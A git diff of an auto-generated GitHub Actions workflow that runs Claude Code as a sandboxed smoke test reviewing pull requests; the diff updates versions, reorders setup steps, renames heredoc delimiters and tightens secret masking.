diff --git a/.github/workflows/smoke-claude.lock.yml b/.github/workflows/smoke-claude.lock.yml
index 9400b465..e60b249a 100644
--- a/.github/workflows/smoke-claude.lock.yml
+++ b/.github/workflows/smoke-claude.lock.yml
@@ -13,11 +13,13 @@
# \ /\ / (_) | | | | ( | | | | (_) \ V V /\__ \
# \/ \/ \___/|_| |_|\_\|_| |_|\___/ \_/\_/ |___/
#
-# This file was automatically generated by gh-aw (v0.42.17). DO NOT EDIT.
+# This file was automatically generated by gh-aw (v0.43.23). DO NOT EDIT.
#
# To update this file, edit the corresponding .md file and run:
# gh aw compile
-# For more information: https://github.com/github/gh-aw/blob/main/.github/aw/github-agentic-workflows.md
+# Not all edits will cause changes to this file.
+#
+# For more information: https://github.github.com/gh-aw/introduction/overview/
#
# Smoke test workflow that validates Claude engine functionality by reviewing recent PRs twice daily
#
@@ -25,7 +27,7 @@
# Imports:
# - shared/mcp-pagination.md
#
-# frontmatter-hash: 26c136ea17d1ecfba9a4fbc8dee8343f290fdaaf308d7e2efaaf5317d2bc75db
+# frontmatter-hash: cddd89980f18349e0ff1b8597c2c85aea8464bed2786100df83cb9520099aa3e
name: "Smoke Claude"
"on":
@@ -61,11 +63,11 @@ jobs:
comment_url: ${{ steps.add-comment.outputs.comment-url }}
steps:
- name: Setup Scripts
- uses: github/gh-aw/actions/setup@7a970851c1090295e55a16e549c61ba1ce227f16 # v0.42.17
+ uses: github/gh-aw/actions/setup@v0.43.23
with:
destination: /opt/gh-aw/actions
- name: Check workflow file timestamps
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
env:
GH_AW_WORKFLOW_FILE: "smoke-claude.lock.yml"
with:
@@ -77,7 +79,7 @@ jobs:
- name: Add comment with workflow run link
id: add-comment
if: github.event_name == 'issues' || github.event_name == 'issue_comment' || github.event_name == 'pull_request_review_comment' || github.event_name == 'discussion' || github.event_name == 'discussion_comment' || (github.event_name == 'pull_request') && (github.event.pull_request.head.repo.id == github.repository_id)
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
env:
GH_AW_WORKFLOW_NAME: "Smoke Claude"
GH_AW_SAFE_OUTPUT_MESSAGES: "{\"footer\":\"\\u003e π₯ *[THE END] β Illustrated by [{workflow_name}]({run_url})*\",\"runStarted\":\"π₯ **WHOOSH!** [{workflow_name}]({run_url}) springs into action on this {event_type}! *[Panel 1 begins...]*\",\"runSuccess\":\"π¬ **THE END** β [{workflow_name}]({run_url}) **MISSION: ACCOMPLISHED!** The hero saves the day! β¨\",\"runFailure\":\"π« **TO BE CONTINUED...** [{workflow_name}]({run_url}) {status}! Our hero faces unexpected challenges...\"}"
@@ -104,6 +106,7 @@ jobs:
GH_AW_SAFE_OUTPUTS: /opt/gh-aw/safeoutputs/outputs.jsonl
GH_AW_SAFE_OUTPUTS_CONFIG_PATH: /opt/gh-aw/safeoutputs/config.json
GH_AW_SAFE_OUTPUTS_TOOLS_PATH: /opt/gh-aw/safeoutputs/tools.json
+ GH_AW_WORKFLOW_ID_SANITIZED: smokeclaude
outputs:
checkout_pr_success: ${{ steps.checkout-pr.outputs.checkout_pr_success || 'true' }}
has_patch: ${{ steps.collect_output.outputs.has_patch }}
@@ -113,11 +116,11 @@ jobs:
secret_verification_result: ${{ steps.validate-secret.outputs.verification_result }}
steps:
- name: Setup Scripts
- uses: github/gh-aw/actions/setup@7a970851c1090295e55a16e549c61ba1ce227f16 # v0.42.17
+ uses: github/gh-aw/actions/setup@v0.43.23
with:
destination: /opt/gh-aw/actions
- - name: Checkout .github and .agents folders
- uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6
+ - name: Checkout repository
+ uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
with:
persist-credentials: false
- name: Create gh-aw temp directory
@@ -128,11 +131,10 @@ jobs:
- name: Restore cache-memory file share data
uses: actions/cache/restore@0057852bfaa89a56745cba8c7296529d2fc39830 # v4.3.0
with:
- key: memory-${{ github.workflow }}-${{ github.run_id }}
+ key: memory-${{ env.GH_AW_WORKFLOW_ID_SANITIZED }}-${{ github.run_id }}
path: /tmp/gh-aw/cache-memory
restore-keys: |
- memory-${{ github.workflow }}-
- memory-
+ memory-${{ env.GH_AW_WORKFLOW_ID_SANITIZED }}-
- name: Configure Git credentials
env:
REPO_NAME: ${{ github.repository }}
@@ -148,7 +150,7 @@ jobs:
id: checkout-pr
if: |
github.event.pull_request
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
env:
GH_TOKEN: ${{ secrets.GH_AW_GITHUB_MCP_SERVER_TOKEN || secrets.GH_AW_GITHUB_TOKEN || secrets.GITHUB_TOKEN }}
with:
@@ -158,6 +160,51 @@ jobs:
setupGlobals(core, github, context, exec, io);
const { main } = require('/opt/gh-aw/actions/checkout_pr_branch.cjs');
await main();
+ - name: Generate agentic run info
+ id: generate_aw_info
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
+ with:
+ script: |
+ const fs = require('fs');
+
+ const awInfo = {
+ engine_id: "claude",
+ engine_name: "Claude Code",
+ model: process.env.GH_AW_MODEL_AGENT_CLAUDE || "",
+ version: "",
+ agent_version: "2.1.39",
+ cli_version: "v0.43.23",
+ workflow_name: "Smoke Claude",
+ experimental: false,
+ supports_tools_allowlist: true,
+ supports_http_transport: true,
+ run_id: context.runId,
+ run_number: context.runNumber,
+ run_attempt: process.env.GITHUB_RUN_ATTEMPT,
+ repository: context.repo.owner + '/' + context.repo.repo,
+ ref: context.ref,
+ sha: context.sha,
+ actor: context.actor,
+ event_name: context.eventName,
+ staged: false,
+ allowed_domains: ["defaults","github","playwright"],
+ firewall_enabled: true,
+ awf_version: "v0.17.0",
+ awmg_version: "",
+ steps: {
+ firewall: "squid"
+ },
+ created_at: new Date().toISOString()
+ };
+
+ // Write to /tmp/gh-aw directory to avoid inclusion in PR
+ const tmpPath = '/tmp/gh-aw/aw_info.json';
+ fs.writeFileSync(tmpPath, JSON.stringify(awInfo, null, 2));
+ console.log('Generated aw_info.json at:', tmpPath);
+ console.log(JSON.stringify(awInfo, null, 2));
+
+ // Set model as output for reuse in other steps/jobs
+ core.setOutput('model', awInfo.model);
- name: Validate CLAUDE_CODE_OAUTH_TOKEN or ANTHROPIC_API_KEY secret
id: validate-secret
run: /opt/gh-aw/actions/validate_multi_secret.sh CLAUDE_CODE_OAUTH_TOKEN ANTHROPIC_API_KEY 'Claude Code' https://github.github.com/gh-aw/reference/engines/#anthropic-claude-code
@@ -165,7 +212,7 @@ jobs:
CLAUDE_CODE_OAUTH_TOKEN: ${{ secrets.CLAUDE_CODE_OAUTH_TOKEN }}
ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}
- name: Setup Node.js
- uses: actions/setup-node@395ad3262231945c25e8478fd5baf05154b1d79f # v6.1.0
+ uses: actions/setup-node@6044e13b5dc448c55e2357c09f80417699197238 # v6.2.0
with:
node-version: '24'
package-manager-cache: false
@@ -195,28 +242,28 @@ jobs:
EOF
sudo chmod +x /usr/local/bin/awf
- name: Install Claude Code CLI
- run: npm install -g --silent @anthropic-ai/claude-code@2.1.34
+ run: npm install -g --silent @anthropic-ai/claude-code@2.1.39
- name: Determine automatic lockdown mode for GitHub MCP server
id: determine-automatic-lockdown
- env:
- TOKEN_CHECK: ${{ secrets.GH_AW_GITHUB_MCP_SERVER_TOKEN }}
- if: env.TOKEN_CHECK != ''
uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
+ env:
+ GH_AW_GITHUB_TOKEN: ${{ secrets.GH_AW_GITHUB_TOKEN }}
+ GH_AW_GITHUB_MCP_SERVER_TOKEN: ${{ secrets.GH_AW_GITHUB_MCP_SERVER_TOKEN }}
with:
script: |
const determineAutomaticLockdown = require('/opt/gh-aw/actions/determine_automatic_lockdown.cjs');
await determineAutomaticLockdown(github, context, core);
- name: Download container images
- run: bash /opt/gh-aw/actions/download_docker_images.sh ghcr.io/github/gh-aw-firewall/agent:0.13.12 ghcr.io/github/gh-aw-firewall/squid:0.13.12 ghcr.io/github/gh-aw-mcpg:v0.0.113 ghcr.io/github/github-mcp-server:v0.30.3 mcr.microsoft.com/playwright/mcp node:lts-alpine
+ run: bash /opt/gh-aw/actions/download_docker_images.sh ghcr.io/github/gh-aw-firewall/agent:0.17.0 ghcr.io/github/gh-aw-firewall/api-proxy:0.17.0 ghcr.io/github/gh-aw-firewall/squid:0.17.0 ghcr.io/github/gh-aw-mcpg:v0.1.4 ghcr.io/github/github-mcp-server:v0.30.3 mcr.microsoft.com/playwright/mcp node:lts-alpine
- name: Write Safe Outputs Config
run: |
mkdir -p /opt/gh-aw/safeoutputs
mkdir -p /tmp/gh-aw/safeoutputs
mkdir -p /tmp/gh-aw/mcp-logs/safeoutputs
- cat > /opt/gh-aw/safeoutputs/config.json << 'EOF'
+ cat > /opt/gh-aw/safeoutputs/config.json << 'GH_AW_SAFE_OUTPUTS_CONFIG_EOF'
{"add_comment":{"max":1},"add_labels":{"allowed":["smoke-claude"],"max":3},"missing_data":{},"missing_tool":{},"noop":{"max":1}}
- EOF
- cat > /opt/gh-aw/safeoutputs/tools.json << 'EOF'
+ GH_AW_SAFE_OUTPUTS_CONFIG_EOF
+ cat > /opt/gh-aw/safeoutputs/tools.json << 'GH_AW_SAFE_OUTPUTS_TOOLS_EOF'
[
{
"description": "Add a comment to an existing GitHub issue, pull request, or discussion. Use this to provide feedback, answer questions, or add information to an existing conversation. For creating new items, use create_issue, create_discussion, or create_pull_request instead. CONSTRAINTS: Maximum 1 comment(s) can be added.",
@@ -330,8 +377,8 @@ jobs:
"name": "missing_data"
}
]
- EOF
- cat > /opt/gh-aw/safeoutputs/validation.json << 'EOF'
+ GH_AW_SAFE_OUTPUTS_TOOLS_EOF
+ cat > /opt/gh-aw/safeoutputs/validation.json << 'GH_AW_SAFE_OUTPUTS_VALIDATION_EOF'
{
"add_comment": {
"defaultMax": 1,
@@ -395,18 +442,17 @@ jobs:
}
}
}
- EOF
+ GH_AW_SAFE_OUTPUTS_VALIDATION_EOF
- name: Generate Safe Outputs MCP Server Config
id: safe-outputs-config
run: |
# Generate a secure random API key (360 bits of entropy, 40+ chars)
- API_KEY=""
+ # Mask immediately to prevent timing vulnerabilities
API_KEY=$(openssl rand -base64 45 | tr -d '/+=')
- PORT=3001
-
- # Register API key as secret to mask it from logs
echo "::add-mask::${API_KEY}"
+ PORT=3001
+
# Set outputs for next steps
{
echo "safe_outputs_api_key=${API_KEY}"
@@ -450,19 +496,17 @@ jobs:
# Export gateway environment variables for MCP config and gateway script
export MCP_GATEWAY_PORT="80"
export MCP_GATEWAY_DOMAIN="host.docker.internal"
- MCP_GATEWAY_API_KEY=""
MCP_GATEWAY_API_KEY=$(openssl rand -base64 45 | tr -d '/+=')
+ echo "::add-mask::${MCP_GATEWAY_API_KEY}"
export MCP_GATEWAY_API_KEY
export MCP_GATEWAY_PAYLOAD_DIR="/tmp/gh-aw/mcp-payloads"
mkdir -p "${MCP_GATEWAY_PAYLOAD_DIR}"
export DEBUG="*"
- # Register API key as secret to mask it from logs
- echo "::add-mask::${MCP_GATEWAY_API_KEY}"
export GH_AW_ENGINE="claude"
- export MCP_GATEWAY_DOCKER_COMMAND='docker run -i --rm --network host -v /var/run/docker.sock:/var/run/docker.sock -e MCP_GATEWAY_PORT -e MCP_GATEWAY_DOMAIN -e MCP_GATEWAY_API_KEY -e MCP_GATEWAY_PAYLOAD_DIR -e DEBUG -e MCP_GATEWAY_LOG_DIR -e GH_AW_MCP_LOG_DIR -e GH_AW_SAFE_OUTPUTS -e GH_AW_SAFE_OUTPUTS_CONFIG_PATH -e GH_AW_SAFE_OUTPUTS_TOOLS_PATH -e GH_AW_ASSETS_BRANCH -e GH_AW_ASSETS_MAX_SIZE_KB -e GH_AW_ASSETS_ALLOWED_EXTS -e DEFAULT_BRANCH -e GITHUB_MCP_SERVER_TOKEN -e GITHUB_MCP_LOCKDOWN -e GITHUB_REPOSITORY -e GITHUB_SERVER_URL -e GITHUB_SHA -e GITHUB_WORKSPACE -e GITHUB_TOKEN -e GITHUB_RUN_ID -e GITHUB_RUN_NUMBER -e GITHUB_RUN_ATTEMPT -e GITHUB_JOB -e GITHUB_ACTION -e GITHUB_EVENT_NAME -e GITHUB_EVENT_PATH -e GITHUB_ACTOR -e GITHUB_ACTOR_ID -e GITHUB_TRIGGERING_ACTOR -e GITHUB_WORKFLOW -e GITHUB_WORKFLOW_REF -e GITHUB_WORKFLOW_SHA -e GITHUB_REF -e GITHUB_REF_NAME -e GITHUB_REF_TYPE -e GITHUB_HEAD_REF -e GITHUB_BASE_REF -e GH_AW_SAFE_OUTPUTS_PORT -e GH_AW_SAFE_OUTPUTS_API_KEY -v /tmp/gh-aw/mcp-payloads:/tmp/gh-aw/mcp-payloads:rw -v /opt:/opt:ro -v /tmp:/tmp:rw -v '"${GITHUB_WORKSPACE}"':'"${GITHUB_WORKSPACE}"':rw ghcr.io/github/gh-aw-mcpg:v0.0.113'
+ export MCP_GATEWAY_DOCKER_COMMAND='docker run -i --rm --network host -v /var/run/docker.sock:/var/run/docker.sock -e MCP_GATEWAY_PORT -e MCP_GATEWAY_DOMAIN -e MCP_GATEWAY_API_KEY -e MCP_GATEWAY_PAYLOAD_DIR -e DEBUG -e MCP_GATEWAY_LOG_DIR -e GH_AW_MCP_LOG_DIR -e GH_AW_SAFE_OUTPUTS -e GH_AW_SAFE_OUTPUTS_CONFIG_PATH -e GH_AW_SAFE_OUTPUTS_TOOLS_PATH -e GH_AW_ASSETS_BRANCH -e GH_AW_ASSETS_MAX_SIZE_KB -e GH_AW_ASSETS_ALLOWED_EXTS -e DEFAULT_BRANCH -e GITHUB_MCP_SERVER_TOKEN -e GITHUB_MCP_LOCKDOWN -e GITHUB_REPOSITORY -e GITHUB_SERVER_URL -e GITHUB_SHA -e GITHUB_WORKSPACE -e GITHUB_TOKEN -e GITHUB_RUN_ID -e GITHUB_RUN_NUMBER -e GITHUB_RUN_ATTEMPT -e GITHUB_JOB -e GITHUB_ACTION -e GITHUB_EVENT_NAME -e GITHUB_EVENT_PATH -e GITHUB_ACTOR -e GITHUB_ACTOR_ID -e GITHUB_TRIGGERING_ACTOR -e GITHUB_WORKFLOW -e GITHUB_WORKFLOW_REF -e GITHUB_WORKFLOW_SHA -e GITHUB_REF -e GITHUB_REF_NAME -e GITHUB_REF_TYPE -e GITHUB_HEAD_REF -e GITHUB_BASE_REF -e GH_AW_SAFE_OUTPUTS_PORT -e GH_AW_SAFE_OUTPUTS_API_KEY -v /tmp/gh-aw/mcp-payloads:/tmp/gh-aw/mcp-payloads:rw -v /opt:/opt:ro -v /tmp:/tmp:rw -v '"${GITHUB_WORKSPACE}"':'"${GITHUB_WORKSPACE}"':rw ghcr.io/github/gh-aw-mcpg:v0.1.4'
- cat << MCPCONFIG_EOF | bash /opt/gh-aw/actions/start_mcp_gateway.sh
+ cat << GH_AW_MCP_CONFIG_EOF | bash /opt/gh-aw/actions/start_mcp_gateway.sh
{
"mcpServers": {
"github": {
@@ -506,54 +550,9 @@ jobs:
"payloadDir": "${MCP_GATEWAY_PAYLOAD_DIR}"
}
}
- MCPCONFIG_EOF
- - name: Generate agentic run info
- id: generate_aw_info
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
- with:
- script: |
- const fs = require('fs');
-
- const awInfo = {
- engine_id: "claude",
- engine_name: "Claude Code",
- model: process.env.GH_AW_MODEL_AGENT_CLAUDE || "",
- version: "",
- agent_version: "2.1.34",
- cli_version: "v0.42.17",
- workflow_name: "Smoke Claude",
- experimental: false,
- supports_tools_allowlist: true,
- supports_http_transport: true,
- run_id: context.runId,
- run_number: context.runNumber,
- run_attempt: process.env.GITHUB_RUN_ATTEMPT,
- repository: context.repo.owner + '/' + context.repo.repo,
- ref: context.ref,
- sha: context.sha,
- actor: context.actor,
- event_name: context.eventName,
- staged: false,
- allowed_domains: ["defaults","github","playwright"],
- firewall_enabled: true,
- awf_version: "v0.13.12",
- awmg_version: "v0.0.113",
- steps: {
- firewall: "squid"
- },
- created_at: new Date().toISOString()
- };
-
- // Write to /tmp/gh-aw directory to avoid inclusion in PR
- const tmpPath = '/tmp/gh-aw/aw_info.json';
- fs.writeFileSync(tmpPath, JSON.stringify(awInfo, null, 2));
- console.log('Generated aw_info.json at:', tmpPath);
- console.log(JSON.stringify(awInfo, null, 2));
-
- // Set model as output for reuse in other steps/jobs
- core.setOutput('model', awInfo.model);
+ GH_AW_MCP_CONFIG_EOF
- name: Generate workflow overview
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
with:
script: |
const { generateWorkflowOverview } = require('/opt/gh-aw/actions/generate_workflow_overview.cjs');
@@ -572,14 +571,15 @@ jobs:
GH_AW_GITHUB_WORKSPACE: ${{ github.workspace }}
run: |
bash /opt/gh-aw/actions/create_prompt_first.sh
- cat << 'PROMPT_EOF' > "$GH_AW_PROMPT"
+ cat << 'GH_AW_PROMPT_EOF' > "$GH_AW_PROMPT"
- PROMPT_EOF
+ GH_AW_PROMPT_EOF
+ cat "/opt/gh-aw/prompts/xpia.md" >> "$GH_AW_PROMPT"
cat "/opt/gh-aw/prompts/temp_folder_prompt.md" >> "$GH_AW_PROMPT"
cat "/opt/gh-aw/prompts/markdown.md" >> "$GH_AW_PROMPT"
cat "/opt/gh-aw/prompts/playwright_prompt.md" >> "$GH_AW_PROMPT"
cat "/opt/gh-aw/prompts/cache_memory_prompt.md" >> "$GH_AW_PROMPT"
- cat << 'PROMPT_EOF' >> "$GH_AW_PROMPT"
+ cat << 'GH_AW_PROMPT_EOF' >> "$GH_AW_PROMPT"
GitHub API Access Instructions
@@ -588,6 +588,19 @@ jobs:
To create or modify GitHub resources (issues, discussions, pull requests, etc.), you MUST call the appropriate safe output tool. Simply writing content will NOT work - the workflow requires actual tool calls.
+ Temporary IDs: Some safe output tools support a temporary ID field (usually named temporary_id) so you can reference newly-created items elsewhere in the SAME agent output (for example, using #aw_abc1 in a later body).
+
+ **IMPORTANT - temporary_id format rules:**
+ - If you DON'T need to reference the item later, OMIT the temporary_id field entirely (it will be auto-generated if needed)
+ - If you DO need cross-references/chaining, you MUST match this EXACT validation regex: /^aw_[A-Za-z0-9]{3,8}$/i
+ - Format: aw_ prefix followed by 3 to 8 alphanumeric characters (A-Z, a-z, 0-9, case-insensitive)
+ - Valid alphanumeric characters: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789
+ - INVALID examples: aw_ab (too short), aw_123456789 (too long), aw_test-id (contains hyphen), aw_id_123 (contains underscore)
+ - VALID examples: aw_abc, aw_abc1, aw_Test123, aw_A1B2C3D4, aw_12345678
+ - To generate valid IDs: use 3-8 random alphanumeric characters or omit the field to let the system auto-generate
+
+ Do NOT invent other aw_* formats β downstream steps will reject them with validation errors matching against /^aw_[A-Za-z0-9]{3,8}$/i.
+
Discover available tools from the safeoutputs MCP server.
**Critical**: Tool calls write structured data that downstream jobs process. Without tool calls, follow-up actions will be skipped.
@@ -623,20 +636,21 @@ jobs:
{{/if}}
- PROMPT_EOF
- cat << 'PROMPT_EOF' >> "$GH_AW_PROMPT"
+ GH_AW_PROMPT_EOF
+ cat << 'GH_AW_PROMPT_EOF' >> "$GH_AW_PROMPT"
- PROMPT_EOF
- cat << 'PROMPT_EOF' >> "$GH_AW_PROMPT"
+ GH_AW_PROMPT_EOF
+ cat << 'GH_AW_PROMPT_EOF' >> "$GH_AW_PROMPT"
{{#runtime-import .github/workflows/shared/mcp-pagination.md}}
- PROMPT_EOF
- cat << 'PROMPT_EOF' >> "$GH_AW_PROMPT"
+ GH_AW_PROMPT_EOF
+ cat << 'GH_AW_PROMPT_EOF' >> "$GH_AW_PROMPT"
{{#runtime-import .github/workflows/smoke-claude.md}}
- PROMPT_EOF
+ GH_AW_PROMPT_EOF
- name: Substitute placeholders
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
env:
GH_AW_PROMPT: /tmp/gh-aw/aw-prompts/prompt.txt
+ GH_AW_ALLOWED_EXTENSIONS: ''
GH_AW_CACHE_DESCRIPTION: ''
GH_AW_CACHE_DIR: '/tmp/gh-aw/cache-memory/'
GH_AW_GITHUB_ACTOR: ${{ github.actor }}
@@ -655,6 +669,7 @@ jobs:
return await substitutePlaceholders({
file: process.env.GH_AW_PROMPT,
substitutions: {
+ GH_AW_ALLOWED_EXTENSIONS: process.env.GH_AW_ALLOWED_EXTENSIONS,
GH_AW_CACHE_DESCRIPTION: process.env.GH_AW_CACHE_DESCRIPTION,
GH_AW_CACHE_DIR: process.env.GH_AW_CACHE_DIR,
GH_AW_GITHUB_ACTOR: process.env.GH_AW_GITHUB_ACTOR,
@@ -668,7 +683,7 @@ jobs:
}
});
- name: Interpolate variables and render templates
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
env:
GH_AW_PROMPT: /tmp/gh-aw/aw-prompts/prompt.txt
GH_AW_GITHUB_REPOSITORY: ${{ github.repository }}
@@ -687,6 +702,8 @@ jobs:
env:
GH_AW_PROMPT: /tmp/gh-aw/aw-prompts/prompt.txt
run: bash /opt/gh-aw/actions/print_prompt_summary.sh
+ - name: Clean git credentials
+ run: bash /opt/gh-aw/actions/clean_git_credentials.sh
- name: Execute Claude Code CLI
id: agentic_execution
# Allowed tools (sorted):
@@ -785,7 +802,7 @@ jobs:
timeout-minutes: 10
run: |
set -o pipefail
- sudo -E awf --tty --env-all --container-workdir "${GITHUB_WORKSPACE}" --allow-domains '*.githubusercontent.com,anthropic.com,api.anthropic.com,api.github.com,api.snapcraft.io,archive.ubuntu.com,azure.archive.ubuntu.com,cdn.playwright.dev,codeload.github.com,crl.geotrust.com,crl.globalsign.com,crl.identrust.com,crl.sectigo.com,crl.thawte.com,crl.usertrust.com,crl.verisign.com,crl3.digicert.com,crl4.digicert.com,crls.ssl.com,files.pythonhosted.org,ghcr.io,github-cloud.githubusercontent.com,github-cloud.s3.amazonaws.com,github.com,github.githubassets.com,host.docker.internal,json-schema.org,json.schemastore.org,keyserver.ubuntu.com,lfs.github.com,objects.githubusercontent.com,ocsp.digicert.com,ocsp.geotrust.com,ocsp.globalsign.com,ocsp.identrust.com,ocsp.sectigo.com,ocsp.ssl.com,ocsp.thawte.com,ocsp.usertrust.com,ocsp.verisign.com,packagecloud.io,packages.cloud.google.com,packages.microsoft.com,playwright.download.prss.microsoft.com,ppa.launchpad.net,pypi.org,raw.githubusercontent.com,registry.npmjs.org,s.symcb.com,s.symcd.com,security.ubuntu.com,sentry.io,statsig.anthropic.com,ts-crl.ws.symantec.com,ts-ocsp.ws.symantec.com' --log-level info --proxy-logs-dir /tmp/gh-aw/sandbox/firewall/logs --enable-host-access --enable-api-proxy --build-local \
+ sudo -E awf --tty --env-all --container-workdir "${GITHUB_WORKSPACE}" --allow-domains '*.githubusercontent.com,anthropic.com,api.anthropic.com,api.github.com,api.snapcraft.io,archive.ubuntu.com,azure.archive.ubuntu.com,cdn.playwright.dev,codeload.github.com,crl.geotrust.com,crl.globalsign.com,crl.identrust.com,crl.sectigo.com,crl.thawte.com,crl.usertrust.com,crl.verisign.com,crl3.digicert.com,crl4.digicert.com,crls.ssl.com,files.pythonhosted.org,ghcr.io,github-cloud.githubusercontent.com,github-cloud.s3.amazonaws.com,github.com,github.githubassets.com,host.docker.internal,json-schema.org,json.schemastore.org,keyserver.ubuntu.com,lfs.github.com,objects.githubusercontent.com,ocsp.digicert.com,ocsp.geotrust.com,ocsp.globalsign.com,ocsp.identrust.com,ocsp.sectigo.com,ocsp.ssl.com,ocsp.thawte.com,ocsp.usertrust.com,ocsp.verisign.com,packagecloud.io,packages.cloud.google.com,packages.microsoft.com,playwright.download.prss.microsoft.com,ppa.launchpad.net,pypi.org,raw.githubusercontent.com,registry.npmjs.org,s.symcb.com,s.symcd.com,security.ubuntu.com,sentry.io,statsig.anthropic.com,ts-crl.ws.symantec.com,ts-ocsp.ws.symantec.com' --log-level info --proxy-logs-dir /tmp/gh-aw/sandbox/firewall/logs --enable-host-access --build-local --enable-api-proxy \
-- /bin/bash -c 'export PATH="$(find /opt/hostedtoolcache -maxdepth 4 -type d -name bin 2>/dev/null | tr '\''\n'\'' '\'':'\'')$PATH"; [ -n "$GOROOT" ] && export PATH="$GOROOT/bin:$PATH" || true && claude --print --disable-slash-commands --no-chrome --max-turns 15 --mcp-config /tmp/gh-aw/mcp-config/mcp-servers.json --allowed-tools '\''Bash,BashOutput,Edit,Edit(/tmp/gh-aw/cache-memory/*),ExitPlanMode,Glob,Grep,KillBash,LS,MultiEdit,MultiEdit(/tmp/gh-aw/cache-memory/*),NotebookEdit,NotebookRead,Read,Read(/tmp/gh-aw/cache-memory/*),Task,TodoWrite,Write,Write(/tmp/gh-aw/cache-memory/*),mcp__github__download_workflow_run_artifact,mcp__github__get_code_scanning_alert,mcp__github__get_commit,mcp__github__get_dependabot_alert,mcp__github__get_discussion,mcp__github__get_discussion_comments,mcp__github__get_file_contents,mcp__github__get_job_logs,mcp__github__get_label,mcp__github__get_latest_release,mcp__github__get_me,mcp__github__get_notification_details,mcp__github__get_pull_request,mcp__github__get_pull_request_comments,mcp__github__get_pull_request_diff,mcp__github__get_pull_request_files,mcp__github__get_pull_request_review_comments,mcp__github__get_pull_request_reviews,mcp__github__get_pull_request_status,mcp__github__get_release_by_tag,mcp__github__get_secret_scanning_alert,mcp__github__get_tag,mcp__github__get_workflow_run,mcp__github__get_workflow_run_logs,mcp__github__get_workflow_run_usage,mcp__github__issue_read,mcp__github__list_branches,mcp__github__list_code_scanning_alerts,mcp__github__list_commits,mcp__github__list_dependabot_alerts,mcp__github__list_discussion_categories,mcp__github__list_discussions,mcp__github__list_issue_types,mcp__github__list_issues,mcp__github__list_label,mcp__github__list_notifications,mcp__github__list_pull_requests,mcp__github__list_releases,mcp__github__list_secret_scanning_alerts,mcp__github__list_starred_repositories,mcp__github__list_tags,mcp__github__list_workflow_jobs,mcp__github__list_workflow_run_artifacts,mcp__github__list_workflow_runs,mcp__github__list_workflows,mcp__github__pull_request_read,mcp__github__search_code,mcp__github__search_issues,mcp__github__search_orgs,mcp__github__search_pull_requests,mcp__github__search_repositories,mcp__github__search_users,mcp__playwright__browser_click,mcp__playwright__browser_close,mcp__playwright__browser_console_messages,mcp__playwright__browser_drag,mcp__playwright__browser_evaluate,mcp__playwright__browser_file_upload,mcp__playwright__browser_fill_form,mcp__playwright__browser_handle_dialog,mcp__playwright__browser_hover,mcp__playwright__browser_install,mcp__playwright__browser_navigate,mcp__playwright__browser_navigate_back,mcp__playwright__browser_network_requests,mcp__playwright__browser_press_key,mcp__playwright__browser_resize,mcp__playwright__browser_select_option,mcp__playwright__browser_snapshot,mcp__playwright__browser_tabs,mcp__playwright__browser_take_screenshot,mcp__playwright__browser_type,mcp__playwright__browser_wait_for'\'' --debug-file /tmp/gh-aw/agent-stdio.log --verbose --permission-mode bypassPermissions --output-format stream-json "$(cat /tmp/gh-aw/aw-prompts/prompt.txt)"${GH_AW_MODEL_AGENT_CLAUDE:+ --model "$GH_AW_MODEL_AGENT_CLAUDE"}' 2>&1 | tee -a /tmp/gh-aw/agent-stdio.log
env:
ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}
@@ -803,6 +820,17 @@ jobs:
GITHUB_WORKSPACE: ${{ github.workspace }}
MCP_TIMEOUT: 120000
MCP_TOOL_TIMEOUT: 60000
+ - name: Configure Git credentials
+ env:
+ REPO_NAME: ${{ github.repository }}
+ SERVER_URL: ${{ github.server_url }}
+ run: |
+ git config --global user.email "github-actions[bot]@users.noreply.github.com"
+ git config --global user.name "github-actions[bot]"
+ # Re-authenticate git with GitHub token
+ SERVER_URL_STRIPPED="${SERVER_URL#https://}"
+ git remote set-url origin "https://x-access-token:${{ github.token }}@${SERVER_URL_STRIPPED}/${REPO_NAME}.git"
+ echo "Git configured with standard GitHub Actions identity"
- name: Stop MCP gateway
if: always()
continue-on-error: true
@@ -814,7 +842,7 @@ jobs:
bash /opt/gh-aw/actions/stop_mcp_gateway.sh "$GATEWAY_PID"
- name: Redact secrets in logs
if: always()
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
with:
script: |
const { setupGlobals } = require('/opt/gh-aw/actions/setup_globals.cjs');
@@ -837,7 +865,7 @@ jobs:
if-no-files-found: warn
- name: Ingest agent output
id: collect_output
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
env:
GH_AW_SAFE_OUTPUTS: ${{ env.GH_AW_SAFE_OUTPUTS }}
